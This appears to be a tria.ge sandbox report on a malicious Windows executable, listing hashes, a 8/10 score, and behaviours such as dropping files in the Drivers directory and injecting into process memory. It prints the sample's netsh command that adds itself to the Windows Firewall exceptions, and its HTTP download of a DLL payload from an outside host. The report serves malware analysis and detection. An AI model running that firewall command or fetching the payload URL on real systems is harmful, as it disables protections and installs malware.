Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

4c6c39e2bf...18.exe

windows7-x64

8

4c6c39e2bf...18.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    140s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    16/07/2024, 02:24 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe

  • Size

    267KB

  • MD5

    4c6c39e2bf83e6f7d191d350e6f07330

  • SHA1

    0d279881815f20a4a24810b59be49a399705a16f

  • SHA256

    32c8a8315c9fc9dbef20cd46b04b476b40f29fd689ed4cc9804d7f22d6343d39

  • SHA512

    103c0414b9cb65ad8af3d9f808b7c16f9e6b7f09d912b3c8e7bef748bb9b60c677bc8ef21fedb894af1f673f0e651616e97396c0a2bac55cf0f161df0f9034aa

  • SSDEEP

    6144:1VUAWgWdIvA3roOXGbb0foxfdKTcPwA+GFpyITCBnIxeV/Pvi3:16ANI7Nqb0fulC2FYITc+q/P

Score
8/10
evasionpersistenceprivilege_escalation

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2484
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe" Msnnmsg ENABLE
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:2908

Network

  • flag-us
    DNS
    www.hamperz.co.uk
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    www.hamperz.co.uk
    IN A
    Response
    www.hamperz.co.uk
    IN A
    85.233.160.215
  • flag-gb
    GET
    http://www.hamperz.co.uk/catalog/temp/conf/psy_1024.dll
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    Remote address:
    85.233.160.215:80
    Request
    GET /catalog/temp/conf/psy_1024.dll HTTP/1.1
    Content-Type: text/html
    Host: www.hamperz.co.uk
    Accept: text/html, */*
    User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, must-revalidate, no-cache
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 245
    X-Frame-Options: SAMEORIGIN
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
  • 85.233.160.215:80
    http://www.hamperz.co.uk/catalog/temp/conf/psy_1024.dll
    http
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    450 B
     742 B
     6
    6

    HTTP Request

    GET http://www.hamperz.co.uk/catalog/temp/conf/psy_1024.dll

    HTTP Response

    200
  • 8.8.8.8:53
    www.hamperz.co.uk
    dns
    4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    63 B
     79 B
     1
    1

    DNS Request

    www.hamperz.co.uk

    DNS Response

    85.233.160.215

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • \Users\Admin\AppData\Local\Temp\4c6c39e2bf83e6f7d191d350e6f07330_JaffaCakes118.exe
    Filesize

    267KB

    MD5

    4c6c39e2bf83e6f7d191d350e6f07330

    SHA1

    0d279881815f20a4a24810b59be49a399705a16f

    SHA256

    32c8a8315c9fc9dbef20cd46b04b476b40f29fd689ed4cc9804d7f22d6343d39

    SHA512

    103c0414b9cb65ad8af3d9f808b7c16f9e6b7f09d912b3c8e7bef748bb9b60c677bc8ef21fedb894af1f673f0e651616e97396c0a2bac55cf0f161df0f9034aa

    Download Submit

  • memory/2484-0-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2484-4-0x0000000000400000-0x00000000004A5000-memory.dmp

    Filesize

    660KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.